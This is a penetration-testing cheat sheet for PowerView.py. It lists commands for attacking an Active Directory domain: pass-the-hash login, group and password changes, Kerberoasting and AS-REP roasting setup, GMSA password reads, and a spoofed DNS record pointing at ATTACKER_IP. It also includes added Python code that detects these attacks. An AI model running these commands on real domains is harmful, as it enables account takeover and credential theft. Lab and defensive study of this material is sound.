🧠PowerView.py
Introduction
PowerView.py is an alternative to the fantastic original PowerView.ps1 script. Most of the modules found in PowerView are available here (some of the flags have changed). The main goal is to provide an interactive session so you do not have to re-authenticate to LDAP for every query.

GitHub Repository: aniqfakhrul/powerview.py - Just another Powerview alternative
Installation
Before installing PowerView.py, you need to install the required system dependencies:
sudo apt install libkrb5-dev
Then install PowerView using pip:
pip3 install powerview --break-system-packages
Usage
PowerView.py supports multiple authentication methods for connecting to Active Directory environments.
Basic Authentication (Username/Password)
powerview domain.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10
Pass-the-Hash (PtH) Authentication
powerview domain.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10
Kerberos Authentication
Authenticate with an existing Kerberos ticket instead of a password (-k --no-pass); the ticket is taken from the credential cache that the KRB5CCNAME environment variable points to, and the DC hostname must resolve (hence -ns and the FQDN in the target):
powerview domain.htb/user@dc.domain.htb --dc-ip 10.10.10.10 -ns dc.domain.htb -k --no-pass
Web Browser Interface
PowerView.py also provides a web interface for easier interaction. Binding it to 127.0.0.1, as below, keeps it reachable only from the local host:
powerview domain.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000
Attacking Active Directory with PowerView.py
PowerView.py provides various commands for Active Directory enumeration and exploitation. Below are some common attack scenarios and their corresponding commands.
User and Group Management
Add User to Group
Add a user to a specific domain group:
Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'
Modify User Password
Change a user's password (requires appropriate permissions):
Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'
Add New Domain User
Create a new user in the domain:
Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'
Kerberoasting Attacks
Set ServicePrincipalName for Kerberoasting
Assign a ServicePrincipalName (SPN) to a user for Kerberoasting attacks. This requires GenericAll/GenericWrite permissions on the target user:
Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'
Execute Kerberoasting Attack
Perform Kerberoasting to extract service tickets:
Invoke-Kerberoast
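Seen from the blue team, the two steps above leave distinct traces in the domain controller's Security log: adding a servicePrincipalName value shows up as a directory object modification (event 5136 with auditing of the Users container enabled), and the roast itself shows up as a burst of service-ticket requests (event 4769) with RC4 encryption (TicketEncryptionType 0x17) for user accounts, since RC4 tickets are the ones that crack cheaply offline. The following is an added Python example, not part of PowerView.py, that runs that logic over a few constructed event records; the field names follow the EventData names of those two events, and the sample records, account names and addresses are made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs), shaped like the EventData fields of
# Windows Security events 4769 (Kerberos service ticket requested) and 5136
# (directory service object modified). Times are ISO 8601 strings.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": "2024-01-01T10:00:01", "TargetUserName": "alice@DOMAIN.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "10.10.10.50"},
    {"EventID": 5136, "Time": "2024-01-01T10:04:00", "SubjectUserName": "bob",
     "ObjectDN": "CN=target,CN=Users,DC=domain,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "cifs/gzzcoo", "OperationType": "%%14674"},
    {"EventID": 4769, "Time": "2024-01-01T10:05:00", "TargetUserName": "bob@DOMAIN.HTB",
     "ServiceName": "target", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "10.10.10.66"},
    {"EventID": 4769, "Time": "2024-01-01T10:05:01", "TargetUserName": "bob@DOMAIN.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "10.10.10.66"},
    {"EventID": 4769, "Time": "2024-01-01T10:05:02", "TargetUserName": "bob@DOMAIN.HTB",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "10.10.10.66"},
    # RC4 tickets for krbtgt or for computer accounts are routine noise and are
    # not kerberoastable targets, so they must be filtered out.
    {"EventID": 4769, "Time": "2024-01-01T10:05:03", "TargetUserName": "alice@DOMAIN.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "Time": "2024-01-01T10:05:04", "TargetUserName": "WS01$@DOMAIN.HTB",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "10.10.10.51"},
]

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP
VALUE_ADDED = "%%14674"          # 5136 OperationType resource string for "Value Added"


def rc4_service_tickets(events):
    """4769 events for a user service account issued with RC4: crackable offline."""
    hits = []
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        if e["TicketEncryptionType"].lower() in RC4_ETYPES:
            hits.append(e)
    return hits


def spn_additions(events):
    """5136 events that add a servicePrincipalName value: the setup step for a targeted roast."""
    return [(e["SubjectUserName"], e["ObjectDN"], e["AttributeValue"])
            for e in events
            if e.get("EventID") == 5136
            and e.get("AttributeLDAPDisplayName") == "servicePrincipalName"
            and e.get("OperationType") == VALUE_ADDED]


def roasting_bursts(events, threshold=3, window=timedelta(minutes=5)):
    """Requesters that obtained RC4 tickets for >= threshold distinct services inside `window`."""
    per_user = defaultdict(list)
    for e in rc4_service_tickets(events):
        per_user[e["TargetUserName"]].append((datetime.fromisoformat(e["Time"]), e["ServiceName"]))
    bursts = {}
    for user, items in per_user.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            services = {svc for t, svc in items[i:] if t - start <= window}
            if len(services) >= threshold:
                bursts[user] = sorted(services)
                break
    return bursts


if __name__ == "__main__":
    for who, dn, value in spn_additions(SAMPLE_EVENTS):
        print(f"SPN added by {who} on {dn}: {value}")
    for user, services in roasting_bursts(SAMPLE_EVENTS).items():
        print(f"possible Kerberoast by {user}: {services}")
```

The single-ticket rule (rc4_service_tickets) is noisy on its own in domains that still have RC4 enabled; the burst rule, many distinct user-account services requested by one principal in a short window, is what usually separates a roast from normal service use. Pairing a 5136 SPN addition with a 4769 for the same object a few minutes later, as in the sample, is the targeted-Kerberoast pattern the Set-DomainObject step above produces.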
ASREPRoasting Attacks
Enable DONT_REQ_PREAUTH for ASREPRoast
Configure a user account to not require Kerberos pre-authentication, which makes it AS-REP roastable. This requires GenericAll/GenericWrite (or write access to userAccountControl) on the target user. The value 4260352 (0x410200) is the bitmask NORMAL_ACCOUNT (0x200) | DONT_EXPIRE_PASSWORD (0x10000) | DONT_REQ_PREAUTH (0x400000); because -Set writes the whole attribute, any other flags the account previously had are cleared:
Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'
Account Management
Enable Disabled User Account
Remove the ACCOUNTDISABLE flag (0x2) to enable a disabled user account. The value 66048 (0x10200) is NORMAL_ACCOUNT (0x200) | DONT_EXPIRE_PASSWORD (0x10000); as above, the whole attribute is replaced, so read the current value first if the account carries other flags you want to keep:
Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'
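Both of the userAccountControl writes above (4260352 for ASREPRoast, 66048 to re-enable an account) replace the whole bitmask, so it helps to be able to decode a value, see exactly which flags a write would set or clear, and scan a list of accounts for the flags that weaken Kerberos. The following is an added Python example, not part of PowerView.py, that does those three things; the flag bits are the documented ADS_USER_FLAG values, and the sample account list is constructed for the example.

```python
from __future__ import annotations

# Added example, not part of PowerView.py: decode and compare userAccountControl
# values such as the 4260352 and 66048 written by the Set-DomainObject commands.
# Bit values are the documented ADS_USER_FLAG_ENUM constants.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Flags a defender wants reported: each one weakens the account's Kerberos posture.
RISKY_FLAGS = {
    "DONT_REQ_PREAUTH": "AS-REP roastable",
    "PASSWD_NOTREQD": "blank password allowed",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation",
    "TRUSTED_TO_AUTH_FOR_DELEGATION": "protocol transition (S4U2Self)",
}


def decode_uac(value: int) -> list[str]:
    """Return the flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def diff_uac(before: int, after: int) -> tuple[list[str], list[str]]:
    """Flags (set, cleared) when the attribute is overwritten from `before` to `after`."""
    old, new = decode_uac(before), decode_uac(after)
    return [n for n in new if n not in old], [n for n in old if n not in new]


def audit_accounts(accounts: list[tuple[str, int]]) -> list[tuple[str, str]]:
    """Report accounts whose userAccountControl carries a risky bit.

    `accounts` is a list of (sAMAccountName, userAccountControl) pairs, e.g. the
    result of an LDAP query for those two attributes.
    """
    findings = []
    for sam, uac in accounts:
        for name in decode_uac(uac):
            if name in RISKY_FLAGS:
                findings.append((sam, f"{name}: {RISKY_FLAGS[name]}"))
    return findings


# Constructed sample data, not taken from a real directory.
SAMPLE_ACCOUNTS = [
    ("alice", 66048),          # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("svc_backup", 4260352),   # same plus DONT_REQ_PREAUTH, as the ASREPRoast command writes
    ("bob", 66050),            # same as alice plus ACCOUNTDISABLE
    ("svc_web", 0x80200),      # NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION
]

if __name__ == "__main__":
    print(decode_uac(4260352))
    # Overwriting svc_web with 4260352 would silently clear TRUSTED_FOR_DELEGATION.
    print(diff_uac(0x80200, 4260352))
    for sam, why in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"{sam}: {why}")
```

diff_uac is the check to run before any -Set on userAccountControl: the page's values assume an account that only had NORMAL_ACCOUNT and DONT_EXPIRE_PASSWORD, and on an account with other bits (delegation settings, SMARTCARD_REQUIRED) the write changes more than the one flag you meant to touch.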
GMSA (Group Managed Service Accounts)
Read GMSA Password
Read the managed password (msDS-ManagedPassword) of the Group Managed Service Accounts that the authenticated principal is allowed to retrieve, i.e. those whose PrincipalsAllowedToRetrieveManagedPassword includes it:
Get-GMSA
Object Ownership and Permissions
Change Object Owner
Make a user the owner of a specific object:
Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'
Computer Management
Add New Domain Computer
Create a new computer account in the domain. By default any authenticated user may do this until the ms-DS-MachineAccountQuota (default 10) is used up, which is why hardening guidance sets that quota to 0:
Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'
DNS Manipulation
Create DNS Record for Spoofing
Add a new record to the Active Directory-integrated DNS zone (ADIDNS) pointing at an attacker-controlled address, for DNS spoofing attacks. On the defensive side, each such record is a new dnsNode object in the zone, which can be audited like any other directory object:
Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>
Security Considerations
When using PowerView.py for penetration testing or security assessments:
Always ensure you have proper authorization before testing
Use these tools only in authorized environments
Document all activities for reporting purposes
Follow responsible disclosure practices
Be aware of the potential impact of your actions on production systems
Troubleshooting
If you encounter issues during installation or usage:
Ensure all dependencies are properly installed
Verify network connectivity to the target domain controller
Check authentication credentials and permissions
Review error messages for specific guidance
Consult the GitHub repository for updates and known issues
Resources
Official Repository: GitHub - aniqfakhrul/powerview.py
Original PowerView: PowerSploit PowerView
Active Directory Security: Microsoft Active Directory Security Documentation